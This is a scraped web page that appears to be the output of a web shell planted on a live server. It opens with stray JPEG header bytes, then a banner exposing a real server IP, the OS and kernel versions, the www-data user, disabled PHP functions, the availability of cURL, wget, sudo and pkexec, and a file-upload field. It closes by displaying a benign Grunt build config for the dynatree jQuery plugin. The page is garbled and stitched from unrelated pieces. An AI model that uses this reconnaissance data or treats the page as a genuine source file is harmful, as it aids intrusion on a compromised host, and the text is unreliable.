����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 3.15.238.90 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/admin/assets/plugins/dynatree/ |
Upload File : |
/*jslint node:true */ module.exports = function(grunt) { // Project configuration. grunt.initConfig({ pkg: "<json:package.json>", // Project metadata, used by the <banner> directive. meta: { banner: "/*! <%= pkg.title || pkg.name %> - v<%= pkg.version %> - " + "<%= grunt.template.today('yyyy-mm-dd') %>\n" + "<%= pkg.homepage ? '* ' + pkg.homepage + '\n' : '' %>" + "* Copyright (c) <%= grunt.template.today('yyyy') %> <%= pkg.author.name %>;" + " Licensed <%= _.pluck(pkg.licenses, 'type').join(', ') %> */" }, concat: { dist: { src: ["<banner:meta.banner>", "<file_strip_banner:src/<%= pkg.name %>.js>"], // src: ["src/jquery.dynatree.js"], dest: "dist/<%= pkg.name %>-<%= pkg.version %>.js" } }, min: { dist: { src: ["<banner:meta.banner>", "<config:concat.dist.dest>"], dest: "dist/<%= pkg.name %>.min.js" } }, // qunit: { // files: ["tests/unit/**/*.html"] // }, lint: { // beforeconcat: ["grunt.js", "src/**/*.js", "tests/**/*.js"], beforeconcat: ["src/jquery.dynatree.js"], // beforeconcat: ["grunt.js"], // beforeconcat: ["grunt.js", "src/jquery.dynatree.js", "tests/**/*.js"], afterconcat: ["<config:concat.dist.dest>"] }, // watch: { // files: "<config:lint.files>", // tasks: "lint qunit" // }, jshint: { options: { // Enforcing Options: bitwise: true, curly: true, // forin: true, eqeqeq: true, immed: true, latedef: true, newcap: true, noarg: true, // noempty: true, nonew: true, // plusplus: true, regexp: true, // strict: true, sub: true, undef: true, // Relaxing Options: eqnull: false, laxbreak: true, // laxcomma: true, smarttabs: false, // globalstrict: true, // Environments: // node: true, // TODO: only for grunt.js and dynatree-server.json browser: true }, globals: { jQuery: true } }, uglify: { } }); // Default task. grunt.registerTask("default", "lint:beforeconcat concat lint:afterconcat min"); };